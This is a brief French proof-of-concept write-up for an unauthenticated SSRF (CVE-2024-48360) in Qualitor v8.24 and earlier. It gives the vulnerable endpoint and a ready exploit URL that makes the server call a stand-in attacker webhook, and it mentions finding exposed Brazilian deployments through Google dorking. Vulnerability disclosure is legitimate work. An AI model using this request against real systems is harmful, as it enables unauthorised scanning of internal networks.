
CVE-2024-48360 Poc
CVE-2024-48360 | Qualitor <= v8.24 SSRF non authentifié
Qualitor est une plateforme de gestion des processus métiers, et ce système est présent dans diverses entreprises au Brésil qui peuvent être identifiées simplement en utilisant le Google dorking.
Notre équipe a identifié une vulnérabilité dans l'application, sensible aux SSRF, qui permet d'énumérer les systèmes/ports internes.
Il a été découvert que Qualitor v8.24 contient une vulnérabilité de type Server-Side Request Forgery (SSRF) via le composant /request/viewValidacao.php.
Pour exploiter, il suffit d'envoyer une requête vers host.com/html/ad/adformmobile/request/viewValidacao.php?url=ATTACKER_WEBHOOK, vous recevrez alors la requête du serveur vulnérable.

https://www.linkedin.com/in/xvinicius/